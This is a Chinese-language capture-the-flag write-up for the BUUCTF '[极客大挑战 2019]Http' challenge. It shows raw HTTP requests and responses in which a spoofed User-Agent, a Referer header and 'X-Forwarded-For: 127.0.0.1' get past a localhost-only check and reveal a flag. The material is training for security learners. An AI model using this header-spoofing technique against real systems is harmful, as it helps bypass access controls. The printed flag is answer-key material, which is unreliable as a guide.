题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Http。
访问环境如下。
该页面的响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:21:45 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4065
Connection: close
Content-Type: text/html; charset=UTF-8<!DOCTYPE HTML><html><head><title>Syclover</title><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><!--[if lte IE 8]><script src="assets/js/ie/html5shiv.js"></script><![endif]--><link rel="stylesheet" href="assets/css/main.css" /><!--[if lte IE 8]><link rel="stylesheet" href="assets/css/ie8.css" /><![endif]--><!--[if lte IE 9]><link rel="stylesheet" href="assets/css/ie9.css" /><![endif]--></head><body class="landing"><style>p,h2{cursor:default;}</style><!-- Page Wrapper --><div id="page-wrapper"><!-- Banner --><section id="banner"><div class="inner"><h2>Syclover</h2><p>Hi Hackers<br />Here is the secret website <br /> of the Syclover <br /></div><a href="#one" class="more scrolly">Learn More</a></section><!-- One --><section id="one" class="wrapper style1 special"><div class="inner"><header class="major"><h2>欢迎来到西南某最大卖鞋厂商 !<br />三叶草安全技术小组(Syclover)</h2><p>当黑客帝国的梦想成为现实,你就是下一个奇迹缔造者!<br />三叶草安全技术小组(Syclover)等待着同样热爱技术的你~<br />Syclover2019招新群:671301484</p></header><ul class="icons major"><li><span class="icon fa-diamond major style1"><span class="label">Lorem</span></span></li><li><span class="icon fa-heart-o major style2"><span class="label">Ipsum</span></span></li><li><span class="icon fa-code major style3"><span class="label">Dolor</span></span></li></ul></div></section><!-- Two --><section id="two" class="wrapper alt style2"><section class="spotlight"><div class="image"><img src="images/pic01.jpg" alt="" /></div><div class="content"><h2>小组简介</h2><p>·成立时间:2005年3月<br /><br />·研究领域:渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术<br /><br />·小组的愿望:致力于成为国内实力强劲和拥有广泛影响力的安全研究团队,为广大的在校同学营造一个良好的信息安全技术<a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a>!</p></div></section></section><script src="assets/js/jquery.min.js"></script><script src="assets/js/jquery.scrollex.min.js"></script><script src="assets/js/jquery.scrolly.min.js"></script><script src="assets/js/skel.min.js"></script><script src="assets/js/util.js"></script><!--[if lte IE 8]><script src="assets/js/ie/respond.min.js"></script><![endif]--><script src="assets/js/main.js"></script><footer id="footer"><ul class="copyright"><li>© Syclover</li><li>Design: Cl4y</li></ul></footer> </body>
</html>可以发现,在页面的源代码中存在 "Secret.php" 页面,访问该页面的响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:20:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2377
Connection: close
Content-Type: text/html; charset=UTF-8<!DOCTYPE html>
<html><style>.slickButton3 {margin-right:20px;margin-left:20px;margin-top:20px;margin-bottom:20px;color: white;font-weight: bold;padding: 10px;border: solid 1px black;background: #111111;cursor: pointer;transition: box-shadow 0.5s;-webkit-transition: box-shadow 0.5s;}.slickButton3:hover {box-shadow:4px 4px 8px #00FFFF;}img {position:absolute;left:20px;top:0px;}p {cursor: default;}.input{border: 1px solid #ccc;padding: 7px 0px;border-radius: 3px;padding-left:5px;-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);box-shadow: inset 0 1px 1px rgba(0,0,0,.075);-webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;-o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s}.input:hover{border-color: #808000;box-shadow: 0px 0px 8px #7CFC00;} </style><head><meta charset="UTF-8"><title>SycSecret</title>
</head>
<body background="./images/background.png" style="background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;" ></br></br></br></br></br></br></br></br></br></br></br></br>
<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
Please use "Syclover" browser</h1>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>可以发现,提示 "Please use "Syclover" browse",而 HTTP 中,"User-Agent" 标头用于标识客户端(即访问者)的一些情况(如使用的浏览器信息,主机信息等),因此使用如下请求包进行访问。
GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:27064
Referer: https://Sycsecret.buuoj.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Syclover/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:20:29 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2387
Connection: close
Content-Type: text/html; charset=UTF-8<!DOCTYPE html>
<html><style>.slickButton3 {margin-right:20px;margin-left:20px;margin-top:20px;margin-bottom:20px;color: white;font-weight: bold;padding: 10px;border: solid 1px black;background: #111111;cursor: pointer;transition: box-shadow 0.5s;-webkit-transition: box-shadow 0.5s;}.slickButton3:hover {box-shadow:4px 4px 8px #00FFFF;}img {position:absolute;left:20px;top:0px;}p {cursor: default;}.input{border: 1px solid #ccc;padding: 7px 0px;border-radius: 3px;padding-left:5px;-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);box-shadow: inset 0 1px 1px rgba(0,0,0,.075);-webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;-o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s}.input:hover{border-color: #808000;box-shadow: 0px 0px 8px #7CFC00;} </style><head><meta charset="UTF-8"><title>SycSecret</title>
</head>
<body background="./images/background.png" style="background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;" ></br></br></br></br></br></br></br></br></br></br></br></br>
<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
No!!! you can only read this locally!!!</h1>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>可以发现,后端提示 "No!!! you can only read this locally!!!"。
而在 HTTP 中,"x-forwarded-for" 常用于标识客户端的 IP 地址,因此使用如下请求包再次访问。
GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:27064
Referer: https://Sycsecret.buuoj.cn
x-forwarded-for: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Syclover/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:20:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2391
Connection: close
Content-Type: text/html; charset=UTF-8<!DOCTYPE html>
<html><style>.slickButton3 {margin-right:20px;margin-left:20px;margin-top:20px;margin-bottom:20px;color: white;font-weight: bold;padding: 10px;border: solid 1px black;background: #111111;cursor: pointer;transition: box-shadow 0.5s;-webkit-transition: box-shadow 0.5s;}.slickButton3:hover {box-shadow:4px 4px 8px #00FFFF;}img {position:absolute;left:20px;top:0px;}p {cursor: default;}.input{border: 1px solid #ccc;padding: 7px 0px;border-radius: 3px;padding-left:5px;-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);box-shadow: inset 0 1px 1px rgba(0,0,0,.075);-webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;-o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s}.input:hover{border-color: #808000;box-shadow: 0px 0px 8px #7CFC00;} </style><head><meta charset="UTF-8"><title>SycSecret</title>
</head>
<body background="./images/background.png" style="background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;" ></br></br></br></br></br></br></br></br></br></br></br></br>
<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
flag{3f4c7b42-8cf1-4b0a-9952-31ba3926b551}
</h1>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>而 flag 就在响应包中。
![[极客大挑战 2019]Upload](https://img2024.cnblogs.com/blog/3549480/202411/3549480-20241102232051694-783719445.png)
![[SUCTF 2019]EasySQL](https://img2024.cnblogs.com/blog/3549480/202411/3549480-20241102231324332-864607604.png)
![[极客大挑战 2019]LoveSQL](https://img2024.cnblogs.com/blog/3549480/202411/3549480-20241102231608568-1930947788.png)
![[BUUCTF]disk](https://img2023.cnblogs.com/blog/3511078/202411/3511078-20241102224750019-861808137.png)
